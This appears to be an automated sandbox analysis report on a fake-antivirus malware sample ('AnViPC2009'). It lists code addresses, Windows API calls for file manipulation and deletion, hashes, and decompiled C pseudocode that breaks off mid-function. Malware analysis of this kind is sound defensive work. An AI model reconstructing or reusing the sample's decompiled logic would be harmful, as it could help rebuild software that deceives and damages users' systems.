                                                                                                                                                      0x0040c344
                                                                                                                                                      0x0040c347
                                                                                                                                                      0x0040c34a
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c34a
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c4b2
                                                                                                                                                      0x0040c4b3
                                                                                                                                                      0x0040c4b8
                                                                                                                                                      0x0040c4ba
                                                                                                                                                      0x0040c4bd
                                                                                                                                                      0x0040c4bd
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c4f3
                                                                                                                                                      0x0040c4fa
                                                                                                                                                      0x0040c4fa
                                                                                                                                                      0x0040c4fd
                                                                                                                                                      0x0040c52a
                                                                                                                                                      0x0040c52a
                                                                                                                                                      0x0040c531
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c531
                                                                                                                                                      0x0040c4ff
                                                                                                                                                      0x0040c4ff
                                                                                                                                                      0x0040c502
                                                                                                                                                      0x0040c517
                                                                                                                                                      0x0040c51e
                                                                                                                                                      0x0040c51e
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c51e
                                                                                                                                                      0x0040c504
                                                                                                                                                      0x0040c504
                                                                                                                                                      0x0040c505
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c507
                                                                                                                                                      0x0040c507
                                                                                                                                                      0x0040c508
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c50e
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c57f
                                                                                                                                                      0x0040c583
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c589
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c59b
                                                                                                                                                      0x0040c59f
                                                                                                                                                      0x0040c6fe
                                                                                                                                                      0x0040c6fe
                                                                                                                                                      0x0040c702
                                                                                                                                                      0x0040c708
                                                                                                                                                      0x0040c70f
                                                                                                                                                      0x0040c711
                                                                                                                                                      0x0040c711
                                                                                                                                                      0x0040c71b
                                                                                                                                                      0x0040c71b
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c702
                                                                                                                                                      0x0040c5b1
                                                                                                                                                      0x0040c5be
                                                                                                                                                      0x0040c5c3
                                                                                                                                                      0x0040c5c7
                                                                                                                                                      0x0040c5c9
                                                                                                                                                      0x0040c5d6
                                                                                                                                                      0x0040c5d6
                                                                                                                                                      0x0040c5dc
                                                                                                                                                      0x0040c5e2
                                                                                                                                                      0x0040c5e3
                                                                                                                                                      0x0040c5e9
                                                                                                                                                      0x0040c5ea
                                                                                                                                                      0x0040c5eb
                                                                                                                                                      0x0040c5ed
                                                                                                                                                      0x0040c5f0
                                                                                                                                                      0x0040c5f6
                                                                                                                                                      0x0040c5f7
                                                                                                                                                      0x0040c5f9
                                                                                                                                                      0x0040c5fc
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c5d0
                                                                                                                                                      0x0040c5d0
                                                                                                                                                      0x0040c5d0
                                                                                                                                                      0x0040c5d3
                                                                                                                                                      0x0040c5d3
                                                                                                                                                      0x0040c60a
                                                                                                                                                      0x0040c610
                                                                                                                                                      0x0040c617
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c61d
                                                                                                                                                      0x0040c624
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c62c
                                                                                                                                                      0x0040c633
                                                                                                                                                      0x0040c63a
                                                                                                                                                      0x0040c63f
                                                                                                                                                      0x0040c641
                                                                                                                                                      0x0040c681
                                                                                                                                                      0x0040c681
                                                                                                                                                      0x0040c688
                                                                                                                                                      0x0040c691
                                                                                                                                                      0x0040c69d
                                                                                                                                                      0x0040c6ab
                                                                                                                                                      0x0040c6ab
                                                                                                                                                      0x0040c6b7
                                                                                                                                                      0x0040c6c5
                                                                                                                                                      0x0040c6cf
                                                                                                                                                      0x0040c6d6
                                                                                                                                                      0x0040c6dc
                                                                                                                                                      0x0040c6df
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c6e5
                                                                                                                                                      0x0040c6e7
                                                                                                                                                      0x0040c6e7
                                                                                                                                                      0x0040c6ec
                                                                                                                                                      0x0040c6f3
                                                                                                                                                      0x0040c6f8
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c6f8
                                                                                                                                                      0x0040c6df
                                                                                                                                                      0x0040c643
                                                                                                                                                      0x0040c645
                                                                                                                                                      0x0040c64c
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c64e
                                                                                                                                                      0x0040c64e
                                                                                                                                                      0x0040c64e
                                                                                                                                                      0x0040c656
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c658
                                                                                                                                                      0x0040c659
                                                                                                                                                      0x0040c661
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c663
                                                                                                                                                      0x0040c66d
                                                                                                                                                      0x0040c674
                                                                                                                                                      0x0040c679
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c727
                                                                                                                                                      0x0040c72b
                                                                                                                                                      0x0040c72d
                                                                                                                                                      0x0040c734
                                                                                                                                                      0x0040c740
                                                                                                                                                      0x0040c740
                                                                                                                                                      0x0040c746
                                                                                                                                                      0x0040c74e
                                                                                                                                                      0x0040c74e
                                                                                                                                                      0x0040c753
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c75f
                                                                                                                                                      0x0040c763
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c769
                                                                                                                                                      0x0040c58b
                                                                                                                                                      0x0040c591
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c770
                                                                                                                                                      0x0040c774
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c77a
                                                                                                                                                      0x0040c782
                                                                                                                                                      0x0040c787
                                                                                                                                                      0x0040c787
                                                                                                                                                      0x0040c78a
                                                                                                                                                      0x0040c7af
                                                                                                                                                      0x0040c78c
                                                                                                                                                      0x0040c78c
                                                                                                                                                      0x0040c78c
                                                                                                                                                      0x0040c78f
                                                                                                                                                      0x0040c7a6
                                                                                                                                                      0x0040c791
                                                                                                                                                      0x0040c791
                                                                                                                                                      0x0040c791
                                                                                                                                                      0x0040c792
                                                                                                                                                      0x0040c79d
                                                                                                                                                      0x0040c794
                                                                                                                                                      0x0040c794
                                                                                                                                                      0x0040c794
                                                                                                                                                      0x0040c792
                                                                                                                                                      0x0040c78f
                                                                                                                                                      0x0040c7bd
                                                                                                                                                      0x0040c7c4
                                                                                                                                                      0x0040c7cb
                                                                                                                                                      0x0040c7d2
                                                                                                                                                      0x0040c7d7
                                                                                                                                                      0x0040c7de
                                                                                                                                                      0x0040c828
                                                                                                                                                      0x0040c82d
                                                                                                                                                      0x0040c82f
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c831
                                                                                                                                                      0x0040c833
                                                                                                                                                      0x0040c83a
                                                                                                                                                      0x0040c840
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c842
                                                                                                                                                      0x0040c842
                                                                                                                                                      0x0040c842
                                                                                                                                                      0x0040c844
                                                                                                                                                      0x0040c847
                                                                                                                                                      0x0040c84e
                                                                                                                                                      0x0040c850
                                                                                                                                                      0x0040c857
                                                                                                                                                      0x0040c85a
                                                                                                                                                      0x0040c85f
                                                                                                                                                      0x0040c861
                                                                                                                                                      0x0040c893
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c893
                                                                                                                                                      0x0040c863
                                                                                                                                                      0x0040c865
                                                                                                                                                      0x0040c868
                                                                                                                                                      0x0040c87c
                                                                                                                                                      0x0040c87c
                                                                                                                                                      0x0040c87d
                                                                                                                                                      0x0040c87d
                                                                                                                                                      0x0040c882
                                                                                                                                                      0x0040c883
                                                                                                                                                      0x0040c889
                                                                                                                                                      0x0040c889
                                                                                                                                                      0x0040c88a
                                                                                                                                                      0x0040c88f
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c88f
                                                                                                                                                      0x0040c86a
                                                                                                                                                      0x0040c86a
                                                                                                                                                      0x0040c86d
                                                                                                                                                      0x0040c86e
                                                                                                                                                      0x0040c874
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c874
                                                                                                                                                      0x0040c849
                                                                                                                                                      0x0040c84c
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c895
                                                                                                                                                      0x0040c895
                                                                                                                                                      0x0040c896
                                                                                                                                                      0x0040c896
                                                                                                                                                      0x0040c89b
                                                                                                                                                      0x0040c89d
                                                                                                                                                      0x0040c89f
                                                                                                                                                      0x0040c89f
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c7e0
                                                                                                                                                      0x0040c7e7
                                                                                                                                                      0x0040c7f5
                                                                                                                                                      0x0040c7fc
                                                                                                                                                      0x0040c801
                                                                                                                                                      0x0040c803
                                                                                                                                                      0x0040c809
                                                                                                                                                      0x0040c815
                                                                                                                                                      0x0040c815
                                                                                                                                                      0x0040c8a2
                                                                                                                                                      0x0040c8a2
                                                                                                                                                      0x0040c8a9
                                                                                                                                                      0x0040c8b2
                                                                                                                                                      0x0040c8b9
                                                                                                                                                      0x0040c8b9
                                                                                                                                                      0x0040c8c5
                                                                                                                                                      0x0040c8d4
                                                                                                                                                      0x0040c8db
                                                                                                                                                      0x0040c8e7
                                                                                                                                                      0x0040c8ec
                                                                                                                                                      0x0040c8f3
                                                                                                                                                      0x0040c8fc
                                                                                                                                                      0x0040c908
                                                                                                                                                      0x0040c90f
                                                                                                                                                      0x0040c90f
                                                                                                                                                      0x0040c91b
                                                                                                                                                      0x0040c922
                                                                                                                                                      0x0040c927
                                                                                                                                                      0x0040c92e
                                                                                                                                                      0x0040c934
                                                                                                                                                      0x0040c936
                                                                                                                                                      0x0040c936
                                                                                                                                                      0x0040c94a
                                                                                                                                                      0x0040c94f
                                                                                                                                                      0x0040c956
                                                                                                                                                      0x0040c95b
                                                                                                                                                      0x0040c95d
                                                                                                                                                      0x0040c96e
                                                                                                                                                      0x0040c97a
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c95f
                                                                                                                                                      0x0040c965
                                                                                                                                                      0x0040c96a
                                                                                                                                                      0x0040c96c
                                                                                                                                                      0x0040c97f
                                                                                                                                                      0x0040c98a
                                                                                                                                                      0x0040c996
                                                                                                                                                      0x0040c998
                                                                                                                                                      0x0040c99a
                                                                                                                                                      0x0040c9a3
                                                                                                                                                      0x0040c9aa
                                                                                                                                                      0x0040c9ac
                                                                                                                                                      0x0040c9ae
                                                                                                                                                      0x0040c9b7
                                                                                                                                                      0x0040c9be
                                                                                                                                                      0x0040c9c0
                                                                                                                                                      0x0040c9c2
                                                                                                                                                      0x0040c9cb
                                                                                                                                                      0x0040c9d9
                                                                                                                                                      0x0040c9de
                                                                                                                                                      0x0040c9e5
                                                                                                                                                      0x0040c9e9
                                                                                                                                                      0x0040c9f7
                                                                                                                                                      0x0040c9f7
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c9e5
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c96c
                                                                                                                                                      0x0040c95d
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c9ff
                                                                                                                                                      0x0040ca03
                                                                                                                                                      0x0040ca05
                                                                                                                                                      0x0040ca05
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c53d
                                                                                                                                                      0x0040c545
                                                                                                                                                      0x0040c54a
                                                                                                                                                      0x0040c54d
                                                                                                                                                      0x0040c573
                                                                                                                                                      0x0040c54f
                                                                                                                                                      0x0040c54f
                                                                                                                                                      0x0040c552
                                                                                                                                                      0x0040c567
                                                                                                                                                      0x0040c554
                                                                                                                                                      0x0040c554
                                                                                                                                                      0x0040c55b
                                                                                                                                                      0x0040c55b
                                                                                                                                                      0x0040c552
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040bfe1
                                                                                                                                                      0x0040bfe5
                                                                                                                                                      0x0040bfea
                                                                                                                                                      0x0040bff1
                                                                                                                                                      0x0040bff1
                                                                                                                                                      0x0040bff4
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040bff6
                                                                                                                                                      0x0040bff6
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040bff6
                                                                                                                                                      0x0040bff4

                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0040B5EC: ExpandEnvironmentStringsA.KERNELBASE(00000000,?,00001000,?,00000000,?,0040BFAD,00000000,?,?,?,?,?,?,0040D289,?), ref: 0040B694
                                                                                                                                                      • lstrcmpiA.KERNEL32(?,?,?,?,00000000,00000000,?,?,?,?,?,?,0040D289,?,00000000,C:\Users\user\Desktop\Endermanch@AnViPC2009.exe), ref: 0040C00B
                                                                                                                                                      • GetCurrentDirectoryA.KERNEL32(00000400,?,?,0040D289,?,00000000,C:\Users\user\Desktop\Endermanch@AnViPC2009.exe,C:\Users\user\Desktop\Endermanch@AnViPC2009.exe,0041A818,0041A824,?), ref: 0040C04D
                                                                                                                                                      • SetFileAttributesA.KERNEL32(?,00000000,?,00000000,?,?,?,?,?,?,?,0040D289,?,00000000,C:\Users\user\Desktop\Endermanch@AnViPC2009.exe,C:\Users\user\Desktop\Endermanch@AnViPC2009.exe), ref: 0040C0D7
                                                                                                                                                      • SHFileOperationA.SHELL32(?,?,00000000), ref: 0040C18E
                                                                                                                                                      • GetFileAttributesA.KERNEL32(?), ref: 0040C19B
                                                                                                                                                      • DeleteFileA.KERNEL32(?), ref: 0040C1A9
                                                                                                                                                      • SetWindowTextA.USER32(?,?), ref: 0040C2E1
                                                                                                                                                      • GetDlgItem.USER32 ref: 0040C396
                                                                                                                                                      • SetWindowTextA.USER32(00000000,00000000), ref: 0040C3A6
                                                                                                                                                      • SendMessageA.USER32 ref: 0040C3B5
                                                                                                                                                      • SendMessageA.USER32 ref: 0040C3DF
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000011.00000002.421736764.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000011.00000002.421706561.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422560908.0000000000412000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422571574.0000000000414000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422796699.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422861556.0000000000421000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: File$AttributesMessageSendTextWindow$CurrentDeleteDirectoryEnvironmentExpandItemOperationStringslstrcmpi
                                                                                                                                                      • String ID: "$%s.%d.tmp$<br>$C:\Program Files (x86)\antiviruspc2009$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                                                                                                                      • API String ID: 297094968-2635522260
                                                                                                                                                      • Opcode ID: 5c1b25c3e832495c687688fa2cc5d6ccee0c1daed2913a424fede135958f499e
                                                                                                                                                      • Instruction ID: b5cb853b9bfe87da93f6a43ed2e6062897ca23f8470ad9b60567a4febf83cb58
                                                                                                                                                      • Opcode Fuzzy Hash: 5c1b25c3e832495c687688fa2cc5d6ccee0c1daed2913a424fede135958f499e
                                                                                                                                                      • Instruction Fuzzy Hash: B9E14C71901218EADB21EBA0CD84BDE77BCAB04344F1042B7AA05F21D1DB789B58CF69
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 87%
                                                                                                                                                      			E004039F5(void* __ecx, void* __edx, intOrPtr _a4, char _a7, char* _a8, char _a11, intOrPtr _a12, signed int _a15) {
                                                                                                                                                      				signed int _v5;
                                                                                                                                                      				signed char* _v12;
                                                                                                                                                      				signed int _v16;
                                                                                                                                                      				char _v20;
                                                                                                                                                      				char _v21;
                                                                                                                                                      				signed int _v25;
                                                                                                                                                      				char _v26;
                                                                                                                                                      				char _v1052;
                                                                                                                                                      				char _v3108;
                                                                                                                                                      				char _v4133;
                                                                                                                                                      				char _v4137;
                                                                                                                                                      				char _v4156;
                                                                                                                                                      				char _v6204;
                                                                                                                                                      				char _v7228;
                                                                                                                                                      				char _v8392;
                                                                                                                                                      				char _v8396;
                                                                                                                                                      				char _v11484;
                                                                                                                                                      				void* __ebx;
                                                                                                                                                      				void* __edi;
                                                                                                                                                      				void* __esi;
                                                                                                                                                      				intOrPtr _t404;
                                                                                                                                                      				signed int _t414;
                                                                                                                                                      				signed int _t421;
                                                                                                                                                      				signed int _t424;
                                                                                                                                                      				signed int _t431;
                                                                                                                                                      				signed int _t437;
                                                                                                                                                      				char* _t441;
                                                                                                                                                      				char _t445;
                                                                                                                                                      				signed char _t450;
                                                                                                                                                      				signed int _t452;
                                                                                                                                                      				signed int _t456;
                                                                                                                                                      				signed int _t467;
                                                                                                                                                      				signed int _t471;
                                                                                                                                                      				signed int _t474;
                                                                                                                                                      				signed int _t491;
                                                                                                                                                      				intOrPtr _t501;
                                                                                                                                                      				signed int _t511;
                                                                                                                                                      				signed int _t512;
                                                                                                                                                      				signed int _t520;
                                                                                                                                                      				signed int _t523;
                                                                                                                                                      				signed int _t524;
                                                                                                                                                      				char _t527;
                                                                                                                                                      				signed int _t531;
                                                                                                                                                      				signed int _t541;
                                                                                                                                                      				signed int _t558;
                                                                                                                                                      				signed int _t559;
                                                                                                                                                      				signed int _t562;
                                                                                                                                                      				signed int _t570;
                                                                                                                                                      				signed int _t580;
                                                                                                                                                      				short* _t582;
                                                                                                                                                      				char* _t587;
                                                                                                                                                      				signed int _t591;
                                                                                                                                                      				short _t592;
                                                                                                                                                      				signed int _t597;
                                                                                                                                                      				signed int _t600;
                                                                                                                                                      				char* _t602;
                                                                                                                                                      				signed int _t604;
                                                                                                                                                      				signed int _t609;
                                                                                                                                                      				void* _t612;
                                                                                                                                                      				signed int _t621;
                                                                                                                                                      				signed int _t623;
                                                                                                                                                      				signed int _t627;
                                                                                                                                                      				intOrPtr _t628;
                                                                                                                                                      				signed int _t630;
                                                                                                                                                      				signed int _t634;
                                                                                                                                                      				intOrPtr _t640;
                                                                                                                                                      				char _t641;
                                                                                                                                                      				signed int _t653;
                                                                                                                                                      				void* _t706;
                                                                                                                                                      				signed int _t714;
                                                                                                                                                      				void* _t715;
                                                                                                                                                      				char* _t716;
                                                                                                                                                      				void* _t718;
                                                                                                                                                      
                                                                                                                                                      				_t706 = __edx;
                                                                                                                                                      				E00401200(0x2cd8);
                                                                                                                                                      				_t640 = _a4;
                                                                                                                                                      				_t716 = _a8;
                                                                                                                                                      				_t715 = __ecx;
                                                                                                                                                      				_v20 =  *((intOrPtr*)(_t640 + 0x329b));
                                                                                                                                                      				if(_a12 != 0) {
                                                                                                                                                      					L5:
                                                                                                                                                      					_t404 =  *((intOrPtr*)(_t716 + 0x4678));
                                                                                                                                                      					_a4 = _t404;
                                                                                                                                                      					__eflags = _t404 - 0x74;
                                                                                                                                                      					if(_t404 == 0x74) {
                                                                                                                                                      						__eflags =  *((char*)(_t715 + 0x1ddf));
                                                                                                                                                      						 *((char*)(_t715 + 0x11dd)) = 0;
                                                                                                                                                      						if( *((char*)(_t715 + 0x1ddf)) != 0) {
                                                                                                                                                      							L202:
                                                                                                                                                      							return 0;
                                                                                                                                                      						}
                                                                                                                                                      						__eflags =  *(_t640 + 0x28cc);
                                                                                                                                                      						if( *(_t640 + 0x28cc) != 0) {
                                                                                                                                                      							L24:
                                                                                                                                                      							OemToCharA(_t716 + 0x46d8, _t716 + 0x46d8);
                                                                                                                                                      							E0040A450( &_v1052, _t716 + 0x46d8);
                                                                                                                                                      							_v6204 = 0;
                                                                                                                                                      							_v21 = 0;
                                                                                                                                                      							_t414 = E00402AAA(_t640, _t716 + 0x46a8,  &_v21, 5); // executed
                                                                                                                                                      							__eflags = _t414;
                                                                                                                                                      							_a15 = _t414 != 0;
                                                                                                                                                      							__eflags = _a15;
                                                                                                                                                      							if(_a15 != 0) {
                                                                                                                                                      								__eflags = _v21;
                                                                                                                                                      								if(_v21 == 0) {
                                                                                                                                                      									 *((char*)(_t715 + 0x559)) = 0;
                                                                                                                                                      								}
                                                                                                                                                      							}
                                                                                                                                                      							__eflags =  *(_t716 + 0x46b0) & 0x00000200;
                                                                                                                                                      							if(( *(_t716 + 0x46b0) & 0x00000200) == 0) {
                                                                                                                                                      								L29:
                                                                                                                                                      								_v5 = 0;
                                                                                                                                                      								L30:
                                                                                                                                                      								asm("sbb eax, eax");
                                                                                                                                                      								_t644 = _t715 + 0x15de;
                                                                                                                                                      								__eflags = _v5;
                                                                                                                                                      								_v16 =  ~(_v5 & 0x000000ff) & _t715 + 0x000015de;
                                                                                                                                                      								if(_v5 != 0) {
                                                                                                                                                      									E00407562(_t716, _t716 + 0x4ad8,  &_v6204);
                                                                                                                                                      									_t621 = E0040E1E9(_t644,  &_v6204,  &_v7228, 0x1000000);
                                                                                                                                                      									__eflags = _t621;
                                                                                                                                                      									if(_t621 != 0) {
                                                                                                                                                      										_t623 = E00407913( &_v7228);
                                                                                                                                                      										__eflags = _t623;
                                                                                                                                                      										if(_t623 != 0) {
                                                                                                                                                      											E0040A450( &_v1052,  &_v7228);
                                                                                                                                                      										}
                                                                                                                                                      									}
                                                                                                                                                      								}
                                                                                                                                                      								E00407463(_t715,  &_v1052,  &_v1052);
                                                                                                                                                      								_t421 = E00401BA3(_t716);
                                                                                                                                                      								__eflags = _t421;
                                                                                                                                                      								if(_t421 != 0) {
                                                                                                                                                      									L19:
                                                                                                                                                      									return 1;
                                                                                                                                                      								}
                                                                                                                                                      								__eflags =  *(_t716 + 0x46b0) & 0x00000800;
                                                                                                                                                      								if(( *(_t716 + 0x46b0) & 0x00000800) == 0) {
                                                                                                                                                      									_t424 = E00401B91(_t716);
                                                                                                                                                      									__eflags = _t424;
                                                                                                                                                      									if(_t424 != 0) {
                                                                                                                                                      										L45:
                                                                                                                                                      										E00401BBC(_t716);
                                                                                                                                                      										 *(_t715 + 0x4ee) =  *(_t716 + 0x46b0) >> 0x00000001 & 0x00000001;
                                                                                                                                                      										 *((char*)(_t715 + 0x4ef)) = 0;
                                                                                                                                                      										asm("sbb ecx, [esi+0x5384]");
                                                                                                                                                      										_t649 = _t716;
                                                                                                                                                      										_t431 = E004054B4(_t716,  *((intOrPtr*)(_t716 + 0x6d80)) -  *(_t716 + 0x5380),  *((intOrPtr*)(_t716 + 0x6d84)), 0);
                                                                                                                                                      										__eflags = _a15;
                                                                                                                                                      										_a11 = 0;
                                                                                                                                                      										_a7 = 0;
                                                                                                                                                      										_v25 = 0;
                                                                                                                                                      										if(_a15 != 0) {
                                                                                                                                                      											L47:
                                                                                                                                                      											__eflags = _v20 - 0x49;
                                                                                                                                                      											_push(_v25);
                                                                                                                                                      											_push((_t431 & 0xffffff00 | _v20 == 0x00000049) & 0x000000ff);
                                                                                                                                                      											_push( *(_t640 + 0x29ba) & 0x000000ff);
                                                                                                                                                      											_t437 = E0040BB2F(_t649,  &_v1052,  &_v6204);
                                                                                                                                                      											__eflags = _t437;
                                                                                                                                                      											if(_t437 == 0) {
                                                                                                                                                      												goto L202;
                                                                                                                                                      											}
                                                                                                                                                      											__eflags =  *(_t716 + 0x46b0) & 0x00000004;
                                                                                                                                                      											if(( *(_t716 + 0x46b0) & 0x00000004) == 0) {
                                                                                                                                                      												L52:
                                                                                                                                                      												_v12 = _t715 + 0x11de;
                                                                                                                                                      												E0040A450(_t715 + 0x11de, _t640 + 0x810);
                                                                                                                                                      												__eflags =  *((intOrPtr*)(_t640 + 0x28c8)) - 5;
                                                                                                                                                      												if( *((intOrPtr*)(_t640 + 0x28c8)) != 5) {
                                                                                                                                                      													L59:
                                                                                                                                                      													_a7 = 0;
                                                                                                                                                      													L56:
                                                                                                                                                      													__eflags = _v20 - 0x45;
                                                                                                                                                      													if(_v20 == 0x45) {
                                                                                                                                                      														L60:
                                                                                                                                                      														_t441 = E004073B4( &_v1052);
                                                                                                                                                      														L61:
                                                                                                                                                      														E0040A5BB(_v12, _t441);
                                                                                                                                                      														_t445 = E0040DB2A( *_v12 & 0x000000ff);
                                                                                                                                                      														__eflags = _a7;
                                                                                                                                                      														_v26 = _t445;
                                                                                                                                                      														if(_a7 != 0) {
                                                                                                                                                      															__eflags =  *((char*)(_t715 + 0x11df)) - 0x5f;
                                                                                                                                                      															if( *((char*)(_t715 + 0x11df)) == 0x5f) {
                                                                                                                                                      																_t597 = E0040728F( *((char*)(_t715 + 0x11e0)));
                                                                                                                                                      																__eflags = _t597;
                                                                                                                                                      																if(_t597 != 0) {
                                                                                                                                                      																	__eflags = _v26 - 0x41 - 0x19;
                                                                                                                                                      																	if(_v26 - 0x41 <= 0x19) {
                                                                                                                                                      																		 *((char*)(_t715 + 0x11df)) = 0x3a;
                                                                                                                                                      																	}
                                                                                                                                                      																}
                                                                                                                                                      															}
                                                                                                                                                      														}
                                                                                                                                                      														__eflags = _v5;
                                                                                                                                                      														if(_v5 == 0) {
                                                                                                                                                      															__eflags = 0;
                                                                                                                                                      															 *(_t715 + 0x15de) = 0;
                                                                                                                                                      															L81:
                                                                                                                                                      															__eflags = _v25;
                                                                                                                                                      															if(_v25 != 0) {
                                                                                                                                                      																L83:
                                                                                                                                                      																_a7 = 0;
                                                                                                                                                      																L84:
                                                                                                                                                      																__eflags =  *((char*)(_t640 + 0x28c4));
                                                                                                                                                      																if( *((char*)(_t640 + 0x28c4)) != 0) {
                                                                                                                                                      																	L86:
                                                                                                                                                      																	__eflags = _v20 - 0x45;
                                                                                                                                                      																	if(_v20 == 0x45) {
                                                                                                                                                      																		L88:
                                                                                                                                                      																		E00403517( &_v11484);
                                                                                                                                                      																		_push(0);
                                                                                                                                                      																		__eflags = E00406007( &_v11484, _t706, _v12, _v16,  &_v11484);
                                                                                                                                                      																		if(__eflags == 0) {
                                                                                                                                                      																			__eflags =  *((char*)(_t640 + 0x28c4));
                                                                                                                                                      																			L93:
                                                                                                                                                      																			if(__eflags == 0) {
                                                                                                                                                      																				L95:
                                                                                                                                                      																				__eflags =  *(_t716 + 0x46b0) & 0x00000004;
                                                                                                                                                      																				if(( *(_t716 + 0x46b0) & 0x00000004) != 0) {
                                                                                                                                                      																					__eflags =  *((char*)(_t715 + 0x115c));
                                                                                                                                                      																					if( *((char*)(_t715 + 0x115c)) == 0) {
                                                                                                                                                      																						E0040321D(0x414c7c, 1);
                                                                                                                                                      																						_a7 = 0;
                                                                                                                                                      																					}
                                                                                                                                                      																				}
                                                                                                                                                      																				_t450 =  *(_t716 + 0x46c8);
                                                                                                                                                      																				__eflags = _t450 - 0x24;
                                                                                                                                                      																				if(_t450 != 0x24) {
                                                                                                                                                      																					__eflags = _t450 - 0x1d;
                                                                                                                                                      																					if(_t450 != 0x1d) {
                                                                                                                                                      																						__eflags =  *((char*)(_t716 + 0x46c9)) - 0x30;
                                                                                                                                                      																						if( *((char*)(_t716 + 0x46c9)) != 0x30) {
                                                                                                                                                      																							E0040B282(_t716 + 0x17, E004098D0(0x6c),  &_v1052);
                                                                                                                                                      																							_t718 = _t718 + 0xc;
                                                                                                                                                      																							_a7 = 0;
                                                                                                                                                      																							E0040321D(0x414c7c, 1);
                                                                                                                                                      																						}
                                                                                                                                                      																					}
                                                                                                                                                      																				}
                                                                                                                                                      																				_t652 =  &_v4156;
                                                                                                                                                      																				E00404E8A( &_v4156);
                                                                                                                                                      																				_push( *(_t716 + 0x46cc));
                                                                                                                                                      																				_t452 = E00403218();
                                                                                                                                                      																				__eflags = _t452;
                                                                                                                                                      																				if(_t452 != 0) {
                                                                                                                                                      																					L138:
                                                                                                                                                      																					__eflags = _a7;
                                                                                                                                                      																					if(_a7 != 0) {
                                                                                                                                                      																						goto L143;
                                                                                                                                                      																					}
                                                                                                                                                      																					goto L139;
                                                                                                                                                      																				} else {
                                                                                                                                                      																					_t652 = _t716;
                                                                                                                                                      																					_t523 = E00401B91(_t716);
                                                                                                                                                      																					__eflags = _t523;
                                                                                                                                                      																					if(_t523 == 0) {
                                                                                                                                                      																						_t524 =  *(_t640 + 0x29ba);
                                                                                                                                                      																						__eflags = _t524;
                                                                                                                                                      																						if(_t524 != 0) {
                                                                                                                                                      																							__eflags = _a7;
                                                                                                                                                      																							if(_a7 != 0) {
                                                                                                                                                      																								_a11 = 1;
                                                                                                                                                      																							}
                                                                                                                                                      																						}
                                                                                                                                                      																						__eflags = _v20 - 0x45;
                                                                                                                                                      																						if(_v20 == 0x45) {
                                                                                                                                                      																							L130:
                                                                                                                                                      																							__eflags = _a7;
                                                                                                                                                      																							if(_a7 == 0) {
                                                                                                                                                      																								L139:
